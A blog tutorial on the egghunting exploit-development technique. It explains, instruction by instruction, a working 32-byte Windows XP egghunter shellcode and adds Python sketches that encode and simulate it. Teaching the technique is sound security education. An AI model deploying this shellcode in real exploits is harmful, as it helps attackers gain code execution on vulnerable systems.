Exploit Dev: EggHunting Explained / D4mianWayne

EggHunting, simply put, is an exploit development technique that searches an application's memory space for a specific keyword, which helps when the exploit is constrained by a length restriction. The “egg” is that keyword or pattern, and the “hunter” is the small piece of code that walks all accessible address space looking for it, hence the hunt.

Before we begin, we must understand why the egghunting technique is needed. Consider a scenario where you are trying to exploit a buffer overflow but cannot place your shellcode in the overflowing buffer because the input length is limited (we will see this in action later). As an exploit developer, the end goal is always code execution by any method possible.

A scenario like this is where creative thinking comes in handy. Let’s say you have another input field which can hold your shellcode/payload, but that buffer does not overwrite the instruction pointer. Consider the following example:

InputA -> Large buffer but does not trigger overflow
InputB -> This one is limited in length and triggers overflow

Here, if we can put our payload in InputA and then, while triggering the overflow via InputB, redirect the instruction pointer to the address of InputA, we gain shellcode execution.

The following image illustrates this:

[Image: EggHunting Explained]

This should clear it up, but the part that confuses most people is where this actually comes in handy. To understand it at a deeper level, we will do a hands-on walkthrough. The aim is to understand the fundamentals of the egghunting technique so that, when you are faced with an actual exploitation scenario, the overall process is easier to make sense of.

So far, we have cleared up the following points:

Egghunting is used when the buffer space is limited and we are unable to execute our shellcode directly (shellcode here means the payload that gives us a reverse shell). For example, let’s say we can write 1056 bytes but EIP is overwritten at 1000 bytes. That leaves just 56 bytes for shellcode, which is not enough for a vanilla buffer overflow, given that a simple msfvenom shellcode is more than 300 bytes long. Hence we use this technique to expand our control.
This technique does not necessarily require control over a second input field where the final shellcode resides. Everything can also live in a single buffer, depending on how the application parses it and where the overflow is limited.
Lastly, the principle is to search the whole address space for an “egg” (pattern) that we have specified. Once it is found, the hunter transfers execution to the identified address, which runs the stored shellcode.
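
To make the arithmetic in the first point concrete, here is a small Python sketch. The 1056 and 1000 figures come from the example above, the 32-byte hunter size is the length of the egghunter listing analyzed later in this post, and 300 bytes is only the assumed lower bound quoted above for an msfvenom reverse shell, not a measured value.

```python
# Numbers taken from the example in the text.
TOTAL_WRITABLE = 1056   # bytes we can write into the overflowing input
EIP_OFFSET = 1000       # offset at which EIP is overwritten

HUNTER_SIZE = 32        # length of the egghunter listing shown later
SHELLCODE_SIZE = 300    # assumed lower bound for an msfvenom reverse shell


def fits(payload_size: int,
         total: int = TOTAL_WRITABLE,
         offset: int = EIP_OFFSET) -> bool:
    """Return True if payload_size bytes fit in the space left over."""
    return payload_size <= total - offset


remaining = TOTAL_WRITABLE - EIP_OFFSET
print(f"space left:         {remaining} bytes")
print(f"reverse shell fits: {fits(SHELLCODE_SIZE)}")
print(f"egghunter fits:     {fits(HUNTER_SIZE)}")
```

The reverse shell does not fit in the leftover space while the hunter does, which is exactly the gap this technique fills.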

Analyzing the EggHunting Shellcode

There is a well-known paper by Skape that explains the overall methodology of egghunting and how it can be used. I recommend reading it to understand the two different ways the technique can be deployed, but we will use the syscall technique, as I prefer it and it is very simple to grasp.

Before we begin, note that I will be using the NtDisplayString syscall, that the shellcode is meant to work on Windows XP, and that the value 0x43 selects the NtDisplayString syscall. The reason for using NtDisplayString is, as Skape himself puts it: “The NtDisplayString system call is typically used to display text to the blue-screen that some people are (unfortunately) all too familiar with. For the purposes of an egg hunter, however, it is abused due to the fact that its only argument is a pointer that is read from and not written to, thus making it a most desirable choice.”

This makes sense, as the NtDisplayString function accepts one argument, a pointer to memory, and reads the string from that memory:

NTSYSAPI
NTSTATUS
NTAPI
NtDisplayString(
    IN PUNICODE_STRING String
);

It is also worth noting that if this function receives a memory address which is not accessible, it returns STATUS_ACCESS_VIOLATION, i.e. the value 0xc0000005.
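
As a quick illustration of that status value, the following Python sketch splits 0xc0000005 into its severity bits and its low byte. The helper names are made up for this example. The low byte matters because the hunter analyzed in this post only inspects the al register after the syscall.

```python
STATUS_ACCESS_VIOLATION = 0xC0000005


def severity(status: int) -> int:
    """Top two bits of an NTSTATUS value (3 means error)."""
    return (status >> 30) & 0x3


def low_byte(status: int) -> int:
    """What ends up in al when the status is returned in eax."""
    return status & 0xFF


print(hex(STATUS_ACCESS_VIOLATION), "severity:", severity(STATUS_ACCESS_VIOLATION))
print("low byte:", low_byte(STATUS_ACCESS_VIOLATION))
```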

Here is a sample egghunting shellcode:

0x0000000000000000:  66 81 CA FF 0F    or    dx, 0xfff
0x0000000000000005:  42                inc   edx
0x0000000000000006:  52                push  edx
0x0000000000000007:  6A 43             push  0x43
0x0000000000000009:  58                pop   eax
0x000000000000000a:  CD 2E             int   0x2e
0x000000000000000c:  3C 05             cmp   al, 5
0x000000000000000e:  5A                pop   edx
0x000000000000000f:  74 EF             je    0
0x0000000000000011:  B8 77 30 30 74    mov   eax, 0x74303077
0x0000000000000016:  8B FA             mov   edi, edx
0x0000000000000018:  AF                scasd eax, dword ptr es:[edi]
0x0000000000000019:  75 EA             jne   5
0x000000000000001b:  AF                scasd eax, dword ptr es:[edi]
0x000000000000001c:  75 E7             jne   5
0x000000000000001e:  FF E7             jmp   edi
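
If you want to carry this listing into an exploit script, one way is to keep it as a commented byte string, as in the Python sketch below. It assumes the syscall number pushed at offset 7 is 0x43, as the text states for NtDisplayString. The helper `short_jump_target` is a name invented here, and it simply re-derives the targets of the three short jumps from their displacement bytes as a sanity check on the listing.

```python
HUNTER = bytes.fromhex(
    "6681caff0f"  # 0x00: or   dx, 0xfff
    "42"          # 0x05: inc  edx
    "52"          # 0x06: push edx
    "6a43"        # 0x07: push 0x43 (assumed NtDisplayString number)
    "58"          # 0x09: pop  eax
    "cd2e"        # 0x0a: int  0x2e
    "3c05"        # 0x0c: cmp  al, 5
    "5a"          # 0x0e: pop  edx
    "74ef"        # 0x0f: je   0x0
    "b877303074"  # 0x11: mov  eax, 0x74303077
    "8bfa"        # 0x16: mov  edi, edx
    "af"          # 0x18: scasd
    "75ea"        # 0x19: jne  0x5
    "af"          # 0x1b: scasd
    "75e7"        # 0x1c: jne  0x5
    "ffe7"        # 0x1e: jmp  edi
)


def short_jump_target(code: bytes, offset: int) -> int:
    """Resolve the target of the 2-byte short jump located at offset."""
    rel8 = int.from_bytes(code[offset + 1:offset + 2], "little", signed=True)
    return offset + 2 + rel8  # displacement is relative to the next instruction


print("hunter length:", len(HUNTER))
for off in (0x0F, 0x19, 0x1C):
    print(hex(off), "->", hex(short_jump_target(HUNTER, off)))
```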

This is a classic egghunter shellcode. Assuming you know a little assembly, such as mov, pop and conditional jumps, there are two things that still stand out here:

scasd : Compares eax with the dword (4-byte value) stored at the address held in edi, sets the flags used by the conditional jumps, and then advances edi by 4 (assuming the direction flag is clear).
int 0x2e : This instruction triggers a software interrupt. On Windows, interrupt vector 0x2e is the system call gateway, basically a way for user-mode code to ask the kernel to perform some operation. There are many different syscalls that can be requested; the eax register holds an integer which selects the operation, and each operation is assigned a different integer.
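
The behaviour of scasd can be modelled in a few lines of Python. This is only a sketch of the instruction's semantics with the direction flag clear, using a bytes object as a stand-in for memory; the function name and the sample buffer are illustrative.

```python
import struct


def scasd(memory: bytes, eax: int, edi: int):
    """Model SCASD with DF=0: compare eax with the dword at [edi].

    Returns (zero_flag, new_edi). edi always advances by 4,
    whether or not the comparison matched.
    """
    (value,) = struct.unpack_from("<I", memory, edi)
    return value == eax, edi + 4


mem = b"w00tw00t\x90\x90\x90\x90"
eax = 0x74303077  # the bytes "w00t" read as a little-endian dword

zf1, edi = scasd(mem, eax, 0)
zf2, edi = scasd(mem, eax, edi)
zf3, _ = scasd(mem, eax, edi)
print(zf1, zf2, zf3, edi)
```

After two successful comparisons edi has moved 8 bytes forward, past both copies of the tag, which is why the hunter can finish with a plain jmp edi.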

Let’s assume that we have taken control of EIP and somehow redirected execution to our egghunting shellcode. I will now walk you through how it works, breaking it down piece by piece:

0x0000000000000000 : This line performs an OR on the dx register with 0xfff, which sets the low 12 bits of edx so that it points at the last byte of the current 4 KB page. The edx register keeps track of the address being examined.
0x0000000000000005 : This instruction increments edx by 1. Coming straight from the OR above, that moves edx to the first byte of the next page.
0x0000000000000006 to 0x000000000000000a : First, this pushes the value of edx to the stack to preserve it, then pushes 0x43 and pops it into eax, so that eax holds 0x43, the NtDisplayString syscall number. Finally, int 0x2e performs the syscall, with edx holding the address being probed.
0x000000000000000c to 0x000000000000000f : Here, we check whether the al register holds 5 after the syscall, then restore edx with pop edx. If al is 5, the address is not accessible, so we jump back to the first instruction, which skips ahead to the next page. By this point it should be clear that this is a loop: the shellcode keeps advancing edx and checking whether the result equals 5, and as long as it does, it keeps going.

Note that we only check for 5, while the returned value is 0xc0000005, because al is an 8-bit register that refers to the low-order 8 bits of eax, hence it will contain 5.
0x0000000000000011 to 0x0000000000000016 : Here, our defined “egg”, i.e. w00t, is loaded into eax as 0x74303077, which is w00t in little-endian (byte-reversed) form, and then the edx value (the memory address reference) is moved to edi.
0x0000000000000018 to 0x0000000000000019 : Then the scasd instruction is executed, which compares eax with the memory at edi by default. In other words, it checks our egg against whatever value is stored at the address held in edi (remember that [edi] means the value stored at the memory pointed to by edi). If the comparison fails, execution goes back to inc edx, which advances the address by 1 byte, and the loop continues to check access and then the values.
0x000000000000001b to 0x000000000000001e : This again compares the memory at edi with our egg, but it only runs when the first scasd has found our w00t; otherwise this piece of code is never reached. Once the first scasd finds the egg, this instruction checks the next 4 bytes stored after the first w00t. If that comparison also succeeds, meaning the second w00t is found, a jmp edi instruction is executed. Because each scasd advances edi by 4, edi now points just past the 8-byte egg, so the jump lands directly on our main shellcode.
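
The whole loop can be simulated in Python to see the control flow without a debugger. This is a rough model under stated assumptions, not the real thing: the `Memory` class, its `probe` method (standing in for the int 0x2e call) and the `limit` cut-off are all invented for this sketch, and a dword read that runs into an unmapped page is simply treated as a mismatch.

```python
import struct

PAGE = 0x1000
EGG = struct.unpack("<I", b"w00t")[0]      # 0x74303077
STATUS_ACCESS_VIOLATION = 0xC0000005


class Memory:
    """Toy sparse address space made of 4 KB pages (hypothetical helper)."""

    def __init__(self):
        self.pages = {}

    def write(self, addr, data):
        for i, byte in enumerate(data):
            a = addr + i
            self.pages.setdefault(a & ~0xFFF, bytearray(PAGE))[a & 0xFFF] = byte

    def probe(self, addr):
        """Stand-in for the syscall: fault if the page is not mapped."""
        return 0 if (addr & ~0xFFF) in self.pages else STATUS_ACCESS_VIOLATION

    def read_dword(self, addr):
        raw = bytearray()
        for a in range(addr, addr + 4):
            page = self.pages.get(a & ~0xFFF)
            if page is None:
                return None                # simplification: treat as mismatch
            raw.append(page[a & 0xFFF])
        return struct.unpack("<I", raw)[0]


def hunt(mem, limit=0x100000):
    """Mirror the hunter's loop; return the address after the egg, or None."""
    edx = 0
    skip_page = True
    while True:
        if skip_page:
            edx |= 0xFFF                   # or dx, 0xfff
        edx += 1                           # inc edx
        if edx >= limit:                   # the real hunter has no such limit
            return None
        if (mem.probe(edx) & 0xFF) == 5:   # int 0x2e / cmp al, 5 / je 0
            skip_page = True
            continue
        skip_page = False
        edi = edx                          # mov edi, edx
        if mem.read_dword(edi) != EGG:     # first scasd / jne 5
            continue
        edi += 4
        if mem.read_dword(edi) != EGG:     # second scasd / jne 5
            continue
        edi += 4
        return edi                         # jmp edi


mem = Memory()
mem.write(0x5123, b"w00tjunk")             # single tag: must be ignored
mem.write(0x9040, b"w00tw00t" + b"\xcc" * 4)
print(hex(hunt(mem)))
```

Unmapped pages cost one probe each, while mapped pages are scanned byte by byte, and the returned address is the first byte after the doubled tag.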

At this point you may be wondering why we have two scasd instructions. Good question. The reason is that during the exploitation phase we write an 8-byte pattern/egg, so the payload the hunter searches for looks like:

w00tw00t + shellcode

Having a unique 8-byte egg helps avoid false positives while the hunter scans memory for this very egg.
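
One concrete false positive is the hunter itself: its mov eax instruction carries a single copy of the 4-byte tag as an immediate. The Python sketch below shows that a single tag matches those bytes while the doubled egg does not. The `SHELLCODE` value is only a placeholder of breakpoint bytes, not a real payload.

```python
import struct

TAG = b"w00t"
EGG = TAG * 2                               # what we place before the payload

# The hunter's "mov eax, 0x74303077" instruction (opcode B8 + imm32).
MOV_EAX_TAG = bytes.fromhex("b877303074")

SHELLCODE = b"\xcc" * 16                    # placeholder, not a real payload
payload = EGG + SHELLCODE                   # w00tw00t + shellcode

print("imm32 as bytes:", struct.pack("<I", 0x74303077))
print("single tag inside hunter:", TAG in MOV_EAX_TAG)
print("doubled egg inside hunter:", EGG in MOV_EAX_TAG)
print("payload starts with egg:", payload.startswith(EGG))
```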

Another question is why we use scasd instead of cmp. There are a few reasons. First, a rule of thumb when writing shellcode is that fewer bytes is better. We are already using the eax and edi registers, and scasd is specifically designed to compare a double word (4 bytes) in eax against the memory at edi, so it avoids unnecessary instructions in our shellcode. You will often have to deal with bad characters too, so it is good practice to use whatever compact option is available. And of course, since the shellcode searches through the whole memory space, you want it to be efficient, hence scasd.
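
To put a number on the size argument, the Python sketch below compares the one-byte scasd against one possible hand-written equivalent. The alternative shown (a cmp followed by an lea to advance edi without touching the flags) is just one encoding chosen for this comparison, not something taken from the hunter above.

```python
SCASD = bytes.fromhex("af")        # scasd

CMP_THEN_ADVANCE = bytes.fromhex(
    "3b07"                         # cmp eax, dword ptr [edi]
    "8d7f04"                       # lea edi, [edi + 4] (flags preserved)
)

saved_per_use = len(CMP_THEN_ADVANCE) - len(SCASD)
print("scasd:", len(SCASD), "byte")
print("cmp + lea:", len(CMP_THEN_ADVANCE), "bytes")
print("saved across two comparisons:", 2 * saved_per_use, "bytes")
```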

I hope you now understand how the egghunting technique works and that, if required, you can write your own egghunting shellcode or take an existing one and modify it to suit your needs.

Ayushman / D4mianWayne

References: